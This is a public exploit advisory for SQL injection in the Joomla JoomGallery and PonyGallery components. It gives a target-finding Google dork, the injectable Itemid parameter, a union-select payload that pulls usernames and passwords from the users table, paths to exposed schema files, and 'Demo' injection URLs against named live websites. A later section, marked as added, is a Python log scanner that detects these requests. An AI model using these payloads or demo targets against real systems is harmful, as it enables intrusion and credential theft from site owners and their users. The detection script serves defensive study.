Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection

2019.02.18
NikbinHK (US)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################################
# Exploit Title: [Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection ]
# Google Dork: inurl:''/index.php?option=com_ponygallery''
# Date: 2/13/2019
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: joomlander.net - joomlacode.org
# Software Link: github.com/JoomGallery/JoomGallery/archive/master.zip
# Version: 3.3.0 3.2.2 for Joomla 3.x and previous versions.
# Tested on: win,linux
######################################################################################
# Exploit :
**********************
/index.php?option=com_ponygallery&Itemid=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special

# Example Payload :
*************************************
%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

# Database Disclosure Exploit :
***************************
/administrator/components/com_joomgallery/sql/install.mysql.utf8.sql
/administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql

# Exploit
/administrator/components/com_joomgallery/sql/updates/mysql/[Version].sql
version : (2.0.0 , 2.0.0 , 2.1.0 , 3.0.0 , 3.1.0 , 3.2.0 , 3.2.1, 3.3.0 )
for Example :
/administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql
####################################################################
[+] Demo : skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en
[+] Demo : okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en
[+] Demo : cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27
[+] TNX to ======> @dgtaIboy | @Deruw | @servering | Ehsan KOoRN | @AhmadBlocker | @NimaProgrammer01 | @Sir_Developer
[+] @Perilous_ManR | @DLuxC4 | @FreeHK | @UniCracker | @BacheGorbeh | @khal0o | @SoheilMV_1996 | @SiR_Li0SioN | @Mahdigh_7
[+] @im_krypton | @Aliwin1 | @midnightcracker ]
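
Both request patterns described above (a non-numeric Itemid sent to com_ponygallery or com_joomgallery, and direct requests for the component's .sql files) can be searched for in web server access logs. The following is an added example, not part of the original advisory; the log lines are constructed samples and the names classify and scan are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Components and schema-file directory named in the advisory.
COMPONENTS = {"com_ponygallery", "com_joomgallery"}
SQL_FILE = re.compile(
    r"/administrator/components/com_joomgallery/sql/.+\.sql$", re.I)
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_ponygallery&Itemid=38 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Feb/2019:10:00:07 +0000] "GET /index.php?option=com_ponygallery&Itemid=38%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [13/Feb/2019:10:00:09 +0000] "GET /joomla/index.php?option=com_joomgallery&func=viewcategory&catid=7&Itemid=44%20union%20select%201 HTTP/1.1" 200 4800',
    '203.0.113.9 - - [13/Feb/2019:10:00:12 +0000] "GET /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql HTTP/1.1" 200 9000',
    '198.51.100.2 - - [13/Feb/2019:10:01:00 +0000] "GET /index.php?option=com_content&Itemid=abc HTTP/1.1" 200 100',
]

def classify(log_line):
    """Return a finding label for one access-log line, or None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if SQL_FILE.search(url.path):
        return "schema-file-request"
    params = parse_qs(url.query)  # percent-decodes values, so %27 becomes '
    if not COMPONENTS & set(params.get("option", [])):
        return None
    # Itemid is a numeric menu item id; anything else deserves review.
    for value in params.get("Itemid", []):
        if not re.fullmatch(r"[0-9]+", value):
            return "non-numeric-Itemid"
    return None

def scan(lines):
    """Return (line_number, label) for every flagged line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        label = classify(line)
        if label:
            findings.append((number, label))
    return findings

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(number, label)
```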

